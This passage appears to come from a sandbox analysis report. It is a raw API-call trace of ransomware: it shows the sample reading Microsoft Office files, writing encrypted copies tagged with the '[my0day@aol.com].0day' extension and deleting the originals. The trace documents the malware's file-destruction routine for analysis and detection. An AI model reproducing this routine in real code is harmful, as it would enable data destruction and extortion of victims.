Shared\\MSInfo\\msinfo32.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.467] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.467] lstrlenW (lpString=".doc") returned 4 [0056.467] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0056.467] lstrlenW (lpString=".docx") returned 5 [0056.467] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0056.467] lstrlenW (lpString=".pdf") returned 4 [0056.467] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0056.467] lstrlenW (lpString=".xls") returned 4 [0056.467] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0056.467] lstrlenW (lpString=".xlsx") returned 5 [0056.467] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0056.467] lstrlenW (lpString=".ppt") returned 4 [0056.467] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0056.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.467] lstrlenW (lpString=".zip") returned 4 [0056.467] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0056.467] lstrlenW (lpString=".rar") returned 4 [0056.467] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0056.467] lstrlenW (lpString=".bz2") returned 4 [0056.467] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0056.467] lstrlenW (lpString=".7z") returned 3 [0056.467] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0056.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.467] lstrlenW (lpString=".dbf") returned 4 [0056.468] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0056.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.468] lstrlenW (lpString=".1cd") returned 4 [0056.468] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0056.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.468] lstrlenW (lpString=".jpg") returned 4 [0056.468] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0056.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.468] lstrlenW (lpString=".doc") returned 4 [0056.468] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0056.468] lstrlenW (lpString=".docx") returned 5 [0056.468] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0056.468] lstrlenW (lpString=".pdf") returned 4 [0056.468] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0056.468] lstrlenW (lpString=".xls") returned 4 [0056.468] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0056.468] lstrlenW (lpString=".xlsx") returned 5 [0056.468] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0056.468] lstrlenW (lpString=".ppt") returned 4 [0056.468] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0056.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.468] lstrlenW (lpString=".zip") returned 4 [0056.468] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0056.468] lstrlenW (lpString=".rar") returned 4 [0056.468] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0056.468] lstrlenW (lpString=".bz2") returned 4 [0056.468] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0056.468] lstrlenW (lpString=".7z") returned 3 [0056.468] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0056.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.469] lstrlenW (lpString=".dbf") returned 4 [0056.469] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0056.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.469] lstrlenW (lpString=".1cd") returned 4 [0056.469] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0056.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0056.469] lstrlenW (lpString=".jpg") returned 4 [0056.469] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0056.469] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0056.469] lstrlenW (lpString="ACEINTL.DLL") returned 11 [0056.469] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0056.469] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=198056) returned 1 [0056.469] CloseHandle (hObject=0x1fc) returned 1 [0056.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 0x20 [0056.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0056.470] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.470] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0056.567] GetLastError () returned 0x0 [0056.567] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x305a8, lpOverlapped=0x0) returned 1 [0056.701] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x305b0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x305b0, lpOverlapped=0x0) returned 1 [0056.706] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.706] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xea, lpOverlapped=0x0) returned 1 [0056.706] SetEndOfFile (hFile=0x218) returned 1 [0056.706] CloseHandle (hObject=0x218) returned 1 [0056.706] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.707] SetEndOfFile (hFile=0x1fc) returned 1 [0056.708] CloseHandle (hObject=0x1fc) returned 1 [0056.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.709] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 1 [0056.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.709] lstrlenW (lpString=".doc") returned 4 [0056.709] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.709] lstrlenW (lpString=".docx") returned 5 [0056.709] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0056.709] lstrlenW (lpString=".pdf") returned 4 [0056.709] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.709] lstrlenW (lpString=".xls") returned 4 [0056.709] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.709] lstrlenW (lpString=".xlsx") returned 5 [0056.709] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0056.709] lstrlenW (lpString=".ppt") returned 4 [0056.709] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.709] lstrlenW (lpString=".zip") returned 4 [0056.709] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.709] lstrlenW (lpString=".rar") returned 4 [0056.709] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.709] lstrlenW (lpString=".bz2") returned 4 [0056.709] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.709] lstrlenW (lpString=".7z") returned 3 [0056.709] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.710] lstrlenW (lpString=".dbf") returned 4 [0056.710] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.710] lstrlenW (lpString=".1cd") returned 4 [0056.710] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.710] lstrlenW (lpString=".jpg") returned 4 [0056.710] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.710] lstrlenW (lpString=".doc") returned 4 [0056.710] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.710] lstrlenW (lpString=".docx") returned 5 [0056.710] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0056.710] lstrlenW (lpString=".pdf") returned 4 [0056.710] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.710] lstrlenW (lpString=".xls") returned 4 [0056.710] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.710] lstrlenW (lpString=".xlsx") returned 5 [0056.710] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0056.710] lstrlenW (lpString=".ppt") returned 4 [0056.710] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.710] lstrlenW (lpString=".zip") returned 4 [0056.710] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.710] lstrlenW (lpString=".rar") returned 4 [0056.710] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.710] lstrlenW (lpString=".bz2") returned 4 [0056.710] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.710] lstrlenW (lpString=".7z") returned 3 [0056.710] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.711] lstrlenW (lpString=".dbf") returned 4 [0056.711] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.711] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.711] lstrlenW (lpString=".1cd") returned 4 [0056.711] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.711] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0056.711] lstrlenW (lpString=".jpg") returned 4 [0056.711] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.711] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".0day") returned 1 [0056.711] lstrlenW (lpString="MSOINTL.REST.IDX_DLL") returned 20 [0056.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0056.711] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=1388416) returned 1 [0056.712] CloseHandle (hObject=0x1fc) returned 1 [0056.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 0x20 [0056.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0056.712] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.712] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0056.712] GetLastError () returned 0x0 [0056.712] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0056.832] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0057.130] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x52f90, lpOverlapped=0x0) returned 1 [0057.143] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x52fa0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x52fa0, lpOverlapped=0x0) returned 1 [0057.151] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.151] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xfc, lpOverlapped=0x0) returned 1 [0057.151] SetEndOfFile (hFile=0x218) returned 1 [0057.492] CloseHandle (hObject=0x218) returned 1 [0057.493] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.493] SetEndOfFile (hFile=0x1fc) returned 1 [0057.496] CloseHandle (hObject=0x1fc) returned 1 [0057.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.496] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 1 [0057.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.604] lstrlenW (lpString=".doc") returned 4 [0057.604] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString=".docx") returned 5 [0057.604] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0057.604] lstrlenW (lpString=".pdf") returned 4 [0057.604] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString=".xls") returned 4 [0057.604] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString=".xlsx") returned 5 [0057.604] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0057.604] lstrlenW (lpString=".ppt") returned 4 [0057.604] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.604] lstrlenW (lpString=".zip") returned 4 [0057.604] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString=".rar") returned 4 [0057.604] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString=".bz2") returned 4 [0057.604] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString=".7z") returned 3 [0057.604] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.604] lstrlenW (lpString=".dbf") returned 4 [0057.604] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.604] lstrlenW (lpString=".1cd") returned 4 [0057.604] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.604] lstrlenW (lpString=".jpg") returned 4 [0057.604] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0057.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.604] lstrlenW (lpString=".doc") returned 4 [0057.605] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString=".docx") returned 5 [0057.605] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0057.605] lstrlenW (lpString=".pdf") returned 4 [0057.605] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString=".xls") returned 4 [0057.605] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString=".xlsx") returned 5 [0057.605] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0057.605] lstrlenW (lpString=".ppt") returned 4 [0057.605] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.605] lstrlenW (lpString=".zip") returned 4 [0057.605] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString=".rar") returned 4 [0057.605] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString=".bz2") returned 4 [0057.605] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString=".7z") returned 3 [0057.605] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.605] lstrlenW (lpString=".dbf") returned 4 [0057.605] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.605] lstrlenW (lpString=".1cd") returned 4 [0057.605] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0057.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0057.605] lstrlenW (lpString=".jpg") returned 4 [0057.605] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0057.605] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0057.606] lstrlenW (lpString="ACEERR.DLL") returned 10 [0057.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.839] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=43408) returned 1 [0057.839] CloseHandle (hObject=0x208) returned 1 [0057.839] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 0x20 [0057.839] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0057.839] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.840] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.840] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0057.840] GetLastError () returned 0x0 [0057.840] ReadFile (in: hFile=0x208, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0xa990, lpOverlapped=0x0) returned 1 [0057.902] WriteFile (in: hFile=0x220, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xa9a0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xa9a0, lpOverlapped=0x0) returned 1 [0057.903] ReadFile (in: hFile=0x208, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.903] WriteFile (in: hFile=0x220, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0057.903] SetEndOfFile 